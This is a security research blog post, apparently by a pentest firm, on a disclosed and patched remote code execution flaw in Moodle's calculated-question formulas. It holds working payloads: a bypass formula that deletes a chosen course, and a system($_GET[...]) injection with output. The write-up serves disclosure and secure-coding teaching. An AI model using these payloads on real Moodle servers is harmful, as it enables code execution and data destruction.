Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle
2024-8-28 21:31:03 Author: govuln.com

27 August 2024

Surprisingly often, implementations include functionality where user input is passed to dangerous functions like PHP’s eval() - despite clear warnings. Often, developers are somewhat aware of this danger and attempt to sanitize the input, but this approach is rarely as robust as assumed. In this post, we will show you how we bypassed the sanitization attempts of the popular learning platform Moodle to achieve remote code execution, and demonstrate why it is always best to stick to the famous quote from Rasmus Lerdorf, creator of PHP:

If eval() is the answer, you’re almost certainly asking the wrong question.

The vulnerability was corrected in Moodle versions 4.4.2, 4.3.6, 4.2.9, and 4.1.12 released Aug 10, 2024.

Person sitting in front of a computer within a burning room

What’s a Moodle?

We recently had a chance to take a closer look at Moodle, a popular learning management system (LMS), in the context of a penetration test. Moodle is used by various companies and universities around the world, including the RWTH Aachen University in Germany - the university where RedTeam Pentesting was originally founded as a research group.

Even at first glance, it is clear that Moodle is a complex system with some surprising security consequences – for example, did you know that all users with the “trainer” role can perform Cross-Site Scripting attacks by design? This gave us the feeling that it would be challenging to completely secure the platform, and we were indeed able to identify several potential vulnerabilities. One of the identified issues was especially interesting, so we decided to publish this blog post with more details on the process of exploiting the vulnerability and our findings along the way.

Being a learning platform, Moodle includes functionality to create quizzes which can be used to test if a lesson was actually understood (or not). One advantage of automatically created tests is the ability to generate a variety of different questions from a single template, which can be realized via calculated questions in Moodle. Calculated questions are numeric questions that can contain variables (called “wildcards” by Moodle), denoted by curly braces (e.g., {a}), which can be assigned to intervals of numbers. Each time the question is generated, the variable is substituted by a different value from the defined number range.

To check whether a given answer to the generated question is correct, trainers can define an answer formula. Can you guess how these formulas are handled in Moodle to enable variable substitution and complicated mathematical expressions? Maybe a dedicated parser is used, which only allows a small subset of safe functions and is carefully constructed to prevent abuse? Or maybe there is an easier way to do this? Well, in this case, formulas are simply passed to eval()!

question/type/calculated/question.php (lines 425-464):

/**
 * Evaluate an expression using the variable values.
 * @param string $expression the expression. A PHP expression with placeholders
 *      like {a} for where the variables need to go.
 * @return float the computed result.
 */
public function calculate($expression) {
    // Make sure no malicious code is present in the expression. Refer MDL-46148 for details.
    if ($error = qtype_calculated_find_formula_errors($expression)) {
        throw new moodle_exception('illegalformulasyntax', 'qtype_calculated', '', $error);
    }
    $expression = $this->substitute_values_for_eval($expression);
    if ($datasets = question_bank::get_qtype('calculated')->find_dataset_names($expression)) {
        // Some placeholders were not substituted.
        throw new moodle_exception('illegalformulasyntax', 'qtype_calculated', '',
            '{' . reset($datasets) . '}');
    }
    return $this->calculate_raw($expression);
}

/**
 * Evaluate an expression after the variable values have been substituted.
 * @param string $expression the expression. A PHP expression with placeholders
 *      like {a} for where the variables need to go.
 * @return float the computed result.
 */
protected function calculate_raw($expression) {
    try {
        // In older PHP versions this this is a way to validate code passed to eval.
        // The trick came from http://php.net/manual/en/function.eval.php.
        if (@eval('return true; $result = ' . $expression . ';')) {
            return eval('return ' . $expression . ';');
        }
    } catch (Throwable $e) {
        // PHP7 and later now throws ParseException and friends from eval(),
        // which is much better.
    }
    // In either case of an invalid $expression, we end here.
    throw new moodle_exception('illegalformulasyntax', 'qtype_calculated', '', $expression);
}

All code examples in this blog post are taken from Moodle version 4.4.1.

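So there is some validation going on (line 433), probably because the functionality could be exploited several times in the past, as also indicated by the comment (MDL-46148). The first eval() call (line 455) only checks whether the expression parses: return true; ends execution before the appended assignment is reached. Every string that passes qtype_calculated_find_formula_errors, however, is then executed by the second eval() call (line 456).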
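A minimal sketch of this two-step pattern outside Moodle: check_then_eval() is a hypothetical stand-in for calculate_raw(), and counted() is a hypothetical function that records whether the expression actually runs.

```php
<?php
// Hypothetical helper that records how often it is executed.
$calls = 0;
function counted(): int
{
    global $calls;
    $calls++;
    return 42;
}

// Stand-in for calculate_raw(): parse first, then evaluate.
function check_then_eval(string $expression)
{
    try {
        // "return true;" exits before the assignment, so this eval() only parses $expression.
        if (@eval('return true; $result = ' . $expression . ';')) {
            // The second eval() is the one that actually runs the expression.
            return eval('return ' . $expression . ';');
        }
    } catch (Throwable $e) {
        // Since PHP 7, syntax errors surface as ParseError exceptions.
    }
    return null;
}

$ok  = check_then_eval('counted() + 1'); // parsed, then executed once
$bad = check_then_eval('1 +');           // rejected by the parse check
```

The parse check never calls counted(); only the second eval() does, which is why any formula that survives validation gets executed.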

The goal now, of course, is to find an expression that executes arbitrary commands when passed to eval but does not fail the validation check. We invite you to try and hack along; maybe you can even find an interesting or more powerful way to circumvent the check (let us know!). You can find a stripped-down version of the relevant functions to test your ideas in our repository for this blog post.

Lesson One: Introducing the Validation Process

Let’s first take a closer look at the validation function, which is also reproduced in the validation.php file in our repository:

question/type/calculated/questiontype.php (lines 1940-1950):

/**
 * Validate a forumula.
 * @param string $formula the formula to validate.
 * @return string|boolean false if there are no problems. Otherwise a string error message.
 */
function qtype_calculated_find_formula_errors($formula) {
    foreach (['//', '/*', '#', '<?', '?>'] as $commentstart) {
        if (strpos($formula, $commentstart) !== false) {
            return get_string('illegalformulasyntax', 'qtype_calculated', $commentstart);
        }
    }

The first constraint imposed by the check is that the given answer formula must not include any PHP comments. Easy enough.

question/type/calculated/questiontype.php (lines 1956-1966):

    $formula = preg_replace(qtype_calculated::PLACEHODLER_REGEX, '1.0', $formula);

    // Strip away empty space and lowercase it.
    $formula = strtolower(str_replace(' ', '', $formula));

    $safeoperatorchar = '-+/*%>:^\~<?=&|!'; /* */
    $operatorornumber = "[{$safeoperatorchar}.0-9eE]";

    while (preg_match("~(^|[{$safeoperatorchar},(])([a-z0-9_]*)" .
            "\\(({$operatorornumber}+(,{$operatorornumber}+((,{$operatorornumber}+)+)?)?)?\\)~",
            $formula, $regs)) {

This is where things get a bit more complicated. First, all variables are replaced by the number 1.0. There are some restrictions on variable names, mostly to prevent quotation marks, but they are relatively benign compared to the rest of the validation, so we will ignore them for now.

Next, the formula is converted to lower case and spaces are removed. Two character sets are defined:

  • “Safe operator characters”, which include operators for basic mathematical expressions, but also bitwise operations and comparisons
  • “Operators or numbers”, where numbers, a dot for decimals, and “e” and “E” for scientific notation are added to the safe operator characters

The main validation logic loops over the formula and repeatedly picks the leftmost innermost expression: a function call or plain parenthesized group whose arguments contain only operators and numbers, and therefore no nested parentheses. If this expression is a plain parenthesis or a call to an explicitly allowed function with the expected number of arguments, it is replaced by 1.0; otherwise, validation fails:

question/type/calculated/questiontype.php (lines 1967-2028):

        switch ($regs[2]) {
            // Simple parenthesis.
            case '':
                if ((isset($regs[4]) && $regs[4]) || strlen($regs[3]) == 0) {
                    return get_string('illegalformulasyntax', 'qtype_calculated', $regs[0]);
                }
                break;

                // Zero argument functions.
            case 'pi':
                if (array_key_exists(3, $regs)) {
                    return get_string('functiontakesnoargs', 'qtype_calculated', $regs[2]);
                }
                break;

            // Single argument functions (the most common case).
            case 'abs': case 'acos': case 'acosh': case 'asin': case 'asinh':
            case 'atan': case 'atanh': case 'bindec': case 'ceil': case 'cos':
            case 'cosh': case 'decbin': case 'decoct': case 'deg2rad':
            case 'exp': case 'expm1': case 'floor': case 'is_finite':
            case 'is_infinite': case 'is_nan': case 'log10': case 'log1p':
            case 'octdec': case 'rad2deg': case 'sin': case 'sinh': case 'sqrt':
            case 'tan': case 'tanh':
                if (!empty($regs[4]) || empty($regs[3])) {
                    return get_string('functiontakesonearg', 'qtype_calculated', $regs[2]);
                }
                break;

                // Functions that take one or two arguments.
            case 'log': case 'round':
                    if (!empty($regs[5]) || empty($regs[3])) {
                        return get_string('functiontakesoneortwoargs', 'qtype_calculated', $regs[2]);
                    }
                break;

                // Functions that must have two arguments.
            case 'atan2': case 'fmod': case 'pow':
                        if (!empty($regs[5]) || empty($regs[4])) {
                            return get_string('functiontakestwoargs', 'qtype_calculated', $regs[2]);
                        }
                break;

                // Functions that take two or more arguments.
            case 'min': case 'max':
                    if (empty($regs[4])) {
                        return get_string('functiontakesatleasttwo', 'qtype_calculated', $regs[2]);
                    }
                break;

            default:
                return get_string('unsupportedformulafunction', 'qtype_calculated', $regs[2]);
        }

        // Exchange the function call with '1.0' and then check for
        // another function call...
        if ($regs[1]) {
            // The function call is proceeded by an operator.
            $formula = str_replace($regs[0], $regs[1] . '1.0', $formula);
        } else {
            // The function call starts the formula.
            $formula = preg_replace('~^' . preg_quote($regs[2], '~') . '\([^)]*\)~', '1.0', $formula);
        }

Note that a handful of mathematical functions are explicitly allowed; all other function names lead to a validation error.

Finally, after the regular expression returns no additional matches, the formula is considered valid if it only contains safe operators or numbers:

question/type/calculated/questiontype.php (lines 2031-2036):

    if (preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula, $regs)) {
        return get_string('illegalformulasyntax', 'qtype_calculated', $regs[0]);
    } else {
        // Formula just might be valid.
        return false;
    }

The original formula will only be passed to eval if this final check is successful.
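To see the reduction in action, the loop can be rerun in isolation on two formulas that come up later in this post. This is a simplified sketch rather than Moodle’s full function: the comment and placeholder checks are skipped, the allowlist is shortened, argument counts are not checked, and reduce_formula() is a hypothetical name.

```php
<?php
// Simplified sketch of the reduction loop in qtype_calculated_find_formula_errors().
function reduce_formula(string $formula): array
{
    $safeoperatorchar = '-+/*%>:^\~<?=&|!';
    $operatorornumber = "[{$safeoperatorchar}.0-9eE]";
    // Assumption: shortened allowlist; '' stands for a plain parenthesis.
    $allowed = ['', 'pi', 'abs', 'acos', 'cos', 'sin', 'sqrt', 'log', 'pow', 'min', 'max'];

    // Same normalisation as Moodle: remove spaces and lowercase.
    $formula = strtolower(str_replace(' ', '', $formula));
    $steps = [$formula];

    while (preg_match("~(^|[{$safeoperatorchar},(])([a-z0-9_]*)" .
            "\\(({$operatorornumber}+(,{$operatorornumber}+((,{$operatorornumber}+)+)?)?)?\\)~",
            $formula, $regs)) {
        if (!in_array($regs[2], $allowed, true)) {
            return [false, $steps]; // unknown function name
        }
        // Replace the innermost call (or plain parenthesis) with '1.0'.
        if ($regs[1]) {
            $formula = str_replace($regs[0], $regs[1] . '1.0', $formula);
        } else {
            $formula = preg_replace('~^' . preg_quote($regs[2], '~') . '\([^)]*\)~', '1.0', $formula);
        }
        $steps[] = $formula;
    }

    // Whatever remains may only contain operators and number characters.
    $valid = preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula) === 0;
    return [$valid, $steps];
}

[$ok, $okSteps]   = reduce_formula('acos(2) . 0+acos(2)');
[$bad, $badSteps] = reduce_formula('acos(2) . acos(2)');
```

The first formula reduces via 1.0.0+acos(2) to 1.0.0+1.0 and is accepted; the second gets stuck at 1.0.acos(2), because no allowed character precedes the second acos, and the leftover letters make the final check fail.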

Note that variables are basically ignored by the validation function, since they are immediately replaced by the number 1.0 in the first step. At first, we did not find a way to make use of this fact, but it turned out to play an important part in the final exploit…

It is also likely that this makes the function trivially exploitable on older versions of PHP that still support accessing offsets with curly braces. For example, (1){phpinfo()} would look like the nonsensical but “safe” expression (1)1.0 to the validation function, and would lead to a call to phpinfo() or any other function defined in the variable name. Unfortunately for us, this notation was deprecated in PHP 7.4 and removed in PHP 8.0, and PHP 8 is the currently supported version on most operating systems, including the system we were testing. So we had to find a different approach.
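A small sketch of what the validator actually checks for such a formula. PLACEHOLDER_PATTERN is our assumption of what qtype_calculated::PLACEHODLER_REGEX matches (the real pattern may differ in detail), and as_seen_by_validator() is a hypothetical helper.

```php
<?php
// Assumption: approximates qtype_calculated::PLACEHODLER_REGEX.
const PLACEHOLDER_PATTERN = '~\{([^{}]+)\}~';

// What the validator checks: placeholders become 1.0, spaces are removed.
function as_seen_by_validator(string $formula): string
{
    $formula = preg_replace(PLACEHOLDER_PATTERN, '1.0', $formula);
    return strtolower(str_replace(' ', '', $formula));
}

$payload = '(1){phpinfo()}';
// The validator never sees phpinfo(); it only checks this reduced string.
$checked = as_seen_by_validator($payload);
```

The reduced string (1)1.0 contains nothing but parentheses and number characters, so it passes every check.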

Get Educated: A Study on Cool PHP Features

Have you ever heard of JSFuck? It is an “esoteric subset” of JavaScript that makes do with only six characters ([]()+!) - and there are similar approaches for PHP (see e.g., this repository). This inspired us to apply a similar technique to bypass the validation logic. However, all the approaches we found at the time require square brackets for array access, and these are completely forbidden by the check. At some point we also discovered other approaches similar to PHPFuck which do not rely on square brackets, but none of them seemed to satisfy the requirements of Moodle’s validation function.

However, there are still a number of powerful tools available to us even without square brackets. First, we get access to several mathematical functions, including our new favourite acos. acos is the inverse of the cosine function and is therefore undefined for values outside the range from -1 to 1. As such, acos(2) is not a number, which is represented as NAN in PHP. But how would a NAN help us to execute code? Well, it’s complicated, but bear with us and we promise it will all make sense in the end. But first, we need more NANs.

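Interestingly, the decimal dot symbol . is also PHP’s string concatenation operator, and numbers are automatically cast to strings when they are concatenated. This means that an expression like “acos(2) . acos(2)” results in the string “NANNAN”. The validator cannot tell the difference: the dot is part of its allowed number characters, and since it strips all spaces first, 0 . 0 simply looks like 0.0 to it, while eval() receives the original formula, spaces included. However, it was not immediately possible to concatenate two calls of acos directly, because the validation logic would not allow the second call without an actual “operator” between the calls (again: for the validator, the dot only counts as a decimal point). Luckily, we quickly found that this restriction can be avoided by using acos(2) . 0+acos(2): since PHP 8, + binds more tightly than ., so this is evaluated as acos(2) . (0+acos(2)). With this, we can finally generate NANNANNANNAN.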
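These building blocks can be checked in a PHP 8 shell. The sketch assumes PHP 8; under PHP 7, the unparenthesized acos(2) . 0+acos(2) would be evaluated left to right and would not yield NANNAN.

```php
<?php
// acos() is only defined on [-1, 1], so acos(2) yields NAN.
$nan = acos(2);

// Concatenation converts the float NAN into the string "NAN".
$single = acos(2) . 1;            // "NAN1"

// PHP 8 gives + higher precedence than ., so this is acos(2) . (0 + acos(2)).
$double = acos(2) . 0+acos(2);    // "NANNAN"

// With spaces, each dot is a concatenation operator: the string "000", not a float.
$digits = 0 . 0 . 0;
```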

Next, we can use the XOR operator ^ (proper use of an actual operator this time!), to flip some of the bits in the resulting string:

(acos(2) . 1) ^ (0 . 0 . 0) ^ (1 . 1 . 1)

This expression is a lot to take in, but let’s step through it part by part. In the first of the three sections, (acos(2) . 1), the result of acos(2) is converted to a string by appending the character 1, resulting in the string NAN1.

The other two sections define strings of digits, which are XORed with NAN1. Here, the concatenation turns the three numbers into a three-character string consisting of the ASCII representations of the digits:

Visualization of an example XOR operation

Next, the XOR operation is performed character by character. The first XOR is applied to the N of NAN1, the 0 of 000, and the 1 of 111. Note that the 0 is not a null byte, but the character 0 with ASCII code 0x30. The same goes for 1, which corresponds to ASCII 0x31.

Visualization of an example XOR operation

The XOR operation between the first and the second section results in the tilde character ~. Finally, we have to XOR the tilde character with the 1 character from the last section, thus resulting in a capital O:

Visualization of an example XOR operation

This seems like a great way to turn the NAN strings into arbitrary letters. Unfortunately, it is not quite that easy, since digits only cover a small subset of the ASCII range (0x30 to 0x39). XORing two digits cancels their shared 0x30 bits, so with pairs of digits we can only flip the four least significant bits, which is not sufficient to generate arbitrary characters. Is this where the journey ends?

No, number theory to the rescue! We can also use negative numbers, and the minus sign (ASCII 0x2D) can be used to flip the elusive higher bits. Say we want to turn an A into a T: we can XOR A with - and 8:

A: 0100 0001
-: 0010 1101
8: 0011 1000
------------
T: 0101 0100

Now that we can get arbitrary characters, let’s move on to arbitrary strings. Remember the 1 from NAN1? We kind of glossed over it when we said that XOR is applied character by character, since the other two sections have no fourth character. In fact, when PHP XORs two strings of different lengths, the result is only as long as the shorter one, so the unmatched 1 is simply dropped. Together with our arbitrarily long sequences of NANNANNANNAN..., this lets us create strings of any length instead of only multiples of three.
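The XOR steps above can be reproduced directly in PHP 8, including the truncation to the shorter operand, the A-to-T example from the bit table, and the low-nibble limitation of digit pairs.

```php
<?php
// String ^ string XORs byte by byte; the result is as long as the shorter operand.
$o = (acos(2) . 1) ^ (0 . 0 . 0) ^ (1 . 1 . 1);   // "NAN1" ^ "000" ^ "111"

// Bit-level check of the A -> T example.
$t = 'A' ^ '-' ^ '8';

// XORing two digit characters cancels their shared 0x30 bits, leaving only the low nibble.
$maxPair = 0;
foreach (str_split('0123456789') as $x) {
    foreach (str_split('0123456789') as $y) {
        $maxPair = max($maxPair, ord($x) ^ ord($y));
    }
}
```

$o is the three-character string O@O (the trailing 1 is gone), and no pair of digits produces a value above 0x0F.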

Since doing this process manually is a pain, we created a script that does it for us.

As a more complete example, the following expression evaluates to PRINTF:

(acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0)
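The authors’ script is not reproduced in this post, so what follows is a hypothetical re-creation under our own assumptions, not their tool. It uses four digit chunks like the PRINTF example and searches, position by position, for digits and minus signs whose XOR with the NAN base yields the target, making sure every - is followed by a digit from 1 to 9 (since -0 would print as 0). With four chunks, the XOR of digits and minus signs always stays within 0x00 to 0x1F, so starting from N and A it only reaches 0x40 to 0x5F: uppercase letters, _ and a few symbols. That is enough here, because PHP function names are case-insensitive. PHP 8 is assumed for the + / . precedence.

```php
<?php
// Hypothetical encoder. Output shape: (acos(2) . 0+acos(2) ...) ^ (c1) ^ (c2) ^ (c3) ^ (c4),
// where each chunk consists only of digits, unary minus and the . operator.

// All 4-tuples over "0123456789-", grouped by the XOR of their character codes.
function xor_table(): array
{
    static $table = null;
    if ($table === null) {
        $alphabet = str_split('0123456789-');
        $table = [];
        foreach ($alphabet as $a) {
            foreach ($alphabet as $b) {
                foreach ($alphabet as $c) {
                    foreach ($alphabet as $d) {
                        $table[ord($a) ^ ord($b) ^ ord($c) ^ ord($d)][] = [$a, $b, $c, $d];
                    }
                }
            }
        }
    }
    return $table;
}

// Depth-first search over positions. Bit j of $need is set when chunk j used '-'
// at the previous position, so it now needs a digit 1-9 ("-0" would print as "0").
function pick(array $cands, int $pos, int $need, array &$dead): ?array
{
    if ($pos === count($cands)) {
        // A trailing '-' gets a dummy digit later; at least one chunk must end here.
        return $need !== 0b1111 ? [] : null;
    }
    if (isset($dead["$pos:$need"])) {
        return null; // already known to be a dead end
    }
    foreach ($cands[$pos] as $tuple) {
        $next = 0;
        foreach ($tuple as $j => $ch) {
            if ((($need >> $j) & 1) && ($ch === '-' || $ch === '0')) {
                continue 2; // chunk j needs a digit 1-9 here
            }
            if ($ch === '-') {
                $next |= 1 << $j;
            }
        }
        $rest = pick($cands, $pos + 1, $next, $dead);
        if ($rest !== null) {
            return array_merge([$tuple], $rest);
        }
    }
    $dead["$pos:$need"] = true;
    return null;
}

function encode(string $target): string
{
    $len = strlen($target);
    if ($len < 3) {
        throw new InvalidArgumentException('targets shorter than 3 characters are not handled');
    }
    // At least two NANs, so the base is always a concatenated string, never a float.
    $nans = max(2, intdiv($len + 2, 3));
    $base = str_repeat('NAN', $nans);
    $table = xor_table();
    $cands = [];
    for ($i = 0; $i < $len; $i++) {
        $cands[] = $table[ord($base[$i]) ^ ord($target[$i])] ?? [];
    }
    $dead = [];
    $tuples = pick($cands, 0, 0, $dead);
    if ($tuples === null) {
        throw new InvalidArgumentException("cannot encode $target with four chunks");
    }
    $parts = ['(' . implode(' . 0+', array_fill(0, $nans, 'acos(2)')) . ')'];
    for ($j = 0; $j < 4; $j++) {
        $tokens = [];
        for ($i = 0; $i < $len; $i++) {
            $ch = $tuples[$i][$j];
            if ($ch !== '-') {
                // A '-' at the previous position becomes part of this token.
                $tokens[] = ($i > 0 && $tuples[$i - 1][$j] === '-') ? "-$ch" : $ch;
            }
        }
        if ($tuples[$len - 1][$j] === '-') {
            $tokens[] = '-1'; // the extra "1" lies past the end and is dropped by XOR
        }
        $parts[] = '(' . implode(' . ', $tokens) . ')';
    }
    return implode(' ^ ', $parts);
}

$printf = encode('PRINTF');
```

eval('return ' . encode('PRINTF') . ';') yields the string PRINTF, although the chunks it picks may differ from the ones shown above.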

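But what can we do with strings? This is where a particular quirk of PHP comes into play: variable functions. With this feature, a string containing a function name can be called just like the function itself: after $f = 'printf';, the call $f('hi') does exactly the same thing as printf('hi').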

Isn’t this great? All we have to do is to find an expression that evaluates to a string containing the function name we want to call, add parentheses with the arguments, and the function is called. Sounds easy enough, so we gave it a try.
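A minimal sketch of variable functions, using strlen() as a harmless example. The parenthesized form at the end is the shape the exploit relies on.

```php
<?php
// A string holding a function name can be called like the function itself.
$direct = strlen('moodle');
$name = 'str' . 'len';
$viaVariable = $name('moodle');

// Function names are case-insensitive, and any parenthesized string expression can be called.
$viaExpression = ('STR' . 'LEN')('moodle');
```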

Coming to (Mid)Terms: Restricted Function Calls

So to summarize, we are now able to generate almost arbitrary strings using valid mathematical expressions. There is just one remaining problem: the validation function does not allow us to directly follow the string with a new set of parentheses. In other words, we can create a function name, which requires a mathematical expression, but we cannot call the function, since this would require a second “expression”, or at least parentheses, and the validation function requires two expressions to be connected with a mathematical operator (e.g. +). Can we find a way around this restriction?

We took another look at the source code at this point, and noticed something interesting about the variable substitution:

question/type/calculated/question.php (lines 466-475):

    /**
     * Substitute variable placehodlers like {a} with their value wrapped in ().
     * @param string $expression the expression. A PHP expression with placeholders
     *      like {a} for where the variables need to go.
     * @return string the expression with each placeholder replaced by the
     *      corresponding value.
     */
    protected function substitute_values_for_eval($expression) {
        return str_replace($this->search, $this->safevalue, $expression);
    }

“With their value wrapped in ()” - this means that when the variable a is set to 1, {a} is substituted by (1). Consequently, if we append {a} to the expression above, which evaluates to 'PRINTF', the result is 'PRINTF'(1) – a function call. Luckily, substitution happens after the validation check, and the check basically ignores variables.

In all, we can define an answer formula with two parts: a (function_name) and a {variable}. The check first removes the {variable} part and performs validation on the remaining expression, which constructs the function name as a string in a single mathematical expression. Then, the substitution happens and gives us our sought-after parentheses (we never thought it would feel so good to add parentheses - is this what LISP programmers feel like every day?)
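The whole trick can be replayed outside Moodle in PHP 8. In this sketch, $search and $safevalue mimic the properties used by substitute_values_for_eval(), with the assumed content '{a}' => '(-7)', and the hand-computed XOR expression builds the string ABS, a harmless stand-in for the functions discussed below.

```php
<?php
// Assumed shape of the question's substitution data: {a} with value -7, wrapped in ().
$search    = ['{a}'];
$safevalue = ['(-7)'];

// XOR expression evaluating to 'ABS' (chunks worked out by hand), followed by {a}.
$formula = '((acos(2) . 0+acos(2)) ^ (7 . 0 . 0) ^ (8 . 3 . 0) ^ (0 . 0 . 0) ^ (0 . 0 . -1)){a}';

// Same call as substitute_values_for_eval(): a plain str_replace().
$expression = str_replace($search, $safevalue, $formula);

// calculate_raw() effectively runs: return <expression>;  i.e. ('ABS')(-7)
$result = eval('return ' . $expression . ';');
```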

There is of course a massive restriction here: This approach only allows us to call functions that take at most one numeric parameter. It is not even possible to use the output of a function call as input for a different function call. In other words, unless we can find a function that allows us to pass more complex commands, for example via information from the HTTP request, the impact of this vulnerability is greatly restricted.

Still, the output of the function call is shown to the attacker, as it is embedded directly into the website. Therefore, functions like phpinfo() can disclose internal information to attackers. In addition, there are several functions which only require a single argument and have an impact on the availability of Moodle. A prominent example is the DELETE_COURSE function (PHP function names are case-insensitive, so this calls Moodle’s delete_course()), which, as the name suggests, deletes a course. It has only one required parameter: the ID of the course, a single integer.

A full exploit resulting in a deleted course would look like this:

  1. Create a calculated question with one variable, for example {a}
  2. Save the question and define the value range of the variable to be exactly the ID of the course you want to delete (course IDs are increasing numbers and easy to guess)
  3. Save the question, then edit it again
  4. Now change the answer formula to the following expression:
     ((acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2)) ^ (8 . 4 . 2 . 8 . 8 . 3 . 4 . 0 . 0 . 0 . -1 . 3) ^ (2 . 0 . 0 . 3 . 0 . 0 . 0 . 0 . 0 . -8 . 1 . 0) ^ (0 . 0 . 0 . 0 . 0 . 0 . -2 . 1 . 4 . 6 . 0 . 0) ^ (0 . 0 . 0 . 0 . -8 . 8 . 0 . 0 . 2 . 0 . -8)){a}
  5. Save again; you might get an error (“Exception - syntax error, unexpected integer”) when trying to save, but this can be ignored
  6. Preview the question - you should get notifications about the selected course being deleted:

Screenshot of a browser showing a list of notifications about a course being deleted above a Moodle question
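To double-check what the formula from step 4 resolves to, its function-name part can be evaluated on its own in PHP 8. The trailing {a} is left out, so nothing is called; this sketch only reveals the generated string.

```php
<?php
// Function-name part of the step 4 formula, without the trailing {a}.
$namePart = '((acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2))'
    . ' ^ (8 . 4 . 2 . 8 . 8 . 3 . 4 . 0 . 0 . 0 . -1 . 3)'
    . ' ^ (2 . 0 . 0 . 3 . 0 . 0 . 0 . 0 . 0 . -8 . 1 . 0)'
    . ' ^ (0 . 0 . 0 . 0 . 0 . 0 . -2 . 1 . 4 . 6 . 0 . 0)'
    . ' ^ (0 . 0 . 0 . 0 . -8 . 8 . 0 . 0 . 2 . 0 . -8))';

// Only builds the string; no function is invoked.
$decoded = eval('return ' . $namePart . ';');
```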

The Finals: Remote Code Execution

We can now call arbitrary functions with exactly one numeric parameter. How do we get to remote code execution from here? Well, if you know the answer, let us know, because we did not actually find a way to do this using the method described above.

Instead, we played around with the validation function some more and noticed something:

php > echo (1)->1.0;
PHP Parse error:  syntax error, unexpected floating-point number "1.0", expecting identifier or variable or "{" or "$" in php shell code on line 1

… the interpreter expects curly braces?

It turns out, there is a somewhat obscure way to access properties of objects using curly braces, which is part of the variable variables syntax (they are actually called that). Following the examples of the PHP documentation, expressions like these are possible:

$foo = new stdClass();
$foo->bar = 'value of bar';
$start = 'b';
$end   = 'ar';
echo $foo->{$start . $end} . "\n"; // prints "value of bar"

This accesses the bar property of the object $foo.

So instead of the complicated expressions described before we can just use an answer formula like the following:

(1)->{system($_GET[chr(97)])}

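The expression in curly braces is evaluated in order to find the referenced property, so all included functions are called as well. In this case, the value of the HTTP query parameter “a” (ASCII 0x61, or 97) is passed to the system() function to execute arbitrary commands. We use the chr function to define the character “a” since quotation marks are not allowed in variable names. The validator, in turn, replaces {system($_GET[chr(97)])} with 1.0 like any other variable and is left with (1)->1.0, which consists only of safe operator characters and numbers: exactly the expression that produced the parse error above.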
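A minimal sketch of this evaluation order, using a hypothetical property_name() function instead of system(). The function inside the braces runs even though 1 is an integer without properties; PHP 8 only emits a warning for the read itself, suppressed here with @.

```php
<?php
// Records every call so we can see that the brace expression was evaluated.
$log = [];
function property_name(): string
{
    global $log;
    $log[] = 'property_name() ran';
    return 'anything';
}

// The property name is computed first, so property_name() runs before PHP
// notices that an int has no properties and returns null.
$value = @(1)->{property_name()};
```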

However, Moodle will interpret {system($_GET[chr(97)])} as a variable and attempt to replace it by a number, which makes no sense in this case and messes up our exploit. Fortunately, we found an obscure way to prevent this from happening: In the form where variable substitutions can be defined, a selection box for the detected variable named {system($_GET[chr(97)])} will be displayed. By editing the HTML markup, the value attribute of the selected option of the variable can be changed to 0 before submitting the request, which prevents it from being substituted. After saving the question, we can choose a command to be executed by adding the query parameter a=[command] to the URL.

All in all, an exploit of this approach would look like this:

  1. Create a calculated question
  2. Set the answer formula to
     (1)->{system($_GET[chr(97)])}
  3. Save, preventing the variable from being substituted as explained above

After saving the question, the error "Exception - system(): Argument #1 ($command) cannot be empty" is returned:

Screenshot of a browser showing an exception about missing arguments for the system function in the Moodle question creation workflow

This is what we get when we change the URL and add &a=id:

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>

<html  dir="ltr" lang="en" xml:lang="en">
<head>
    <title>Editing a Calculated question | Test</title>
[...]

And we’re in.

AfterMath

In conclusion, we found a way for users with the “trainer” role, which has the required permissions to create questions by default, to execute code on Moodle servers.

We would have preferred the complex approach to be the one that resulted in arbitrary RCE in the end, since it makes for a cooler story. In fact, this blog post probably wouldn’t exist if we had only found the second variant. Still, it demonstrates that an easier solution is often superior, and that looking left and right while digging deep is usually beneficial during penetration tests.

This finding was communicated to the Moodle security team on Jul 12, 2024, and has been fixed in versions 4.4.2, 4.3.6, 4.2.9, and 4.1.12, released Aug 10, 2024. You can also find the corresponding advisory on our website.

The issue described in this blog post was fixed by restricting the set of allowed characters in variable names and formulas. The fixed versions no longer include the required binary operations in the allowed formula syntax, which thwarts our method of creating arbitrary strings. In addition, variable names can now only include alphanumeric characters, spaces, minuses or underscores, which is not sufficient to call or (re-)define arbitrary functions (which requires parentheses), or, for example, to overwrite variables (which requires the dollar symbol). While this still allows the use of several keywords in variable names, such as new, we did not find any obvious way to abuse this behaviour in the time we had available to confirm the fix. The call to eval() remains; however, the project has mentioned plans to replace it with a custom parsing library in the future, when time permits.
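A minimal sketch of a variable-name allowlist along the lines of the fix, assuming only ASCII letters and digits count as alphanumeric. is_allowed_variable_name() is hypothetical and not Moodle’s actual implementation.

```php
<?php
// Hypothetical allowlist: letters, digits, spaces, '-' and '_' only.
// \A and \z anchor the whole string (a plain $ would also accept a trailing newline).
function is_allowed_variable_name(string $name): bool
{
    return preg_match('~\A[a-zA-Z0-9 _-]+\z~', $name) === 1;
}
```

With such a rule, the RCE variable name fails immediately, because its parentheses, brackets and dollar sign are all outside the allowed set.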

To summarize, it is still a bad idea to pass user input to eval, even if you perform sanitization. PHP has a lot of features and quirks that make it possible to obfuscate malicious input, including PHPFuck, variable functions, and the obscure way to access object properties using curly braces. It is virtually impossible to understand all obscure aspects and interactions of a programming language well enough to sanitize input effectively. Consequently, we have to concur with the creator of PHP:

If eval() is the answer, you’re almost certainly asking the wrong question.

And before you ask: this also holds for basically all other languages with an eval equivalent.


Article source: https://govuln.com/news/url/B16N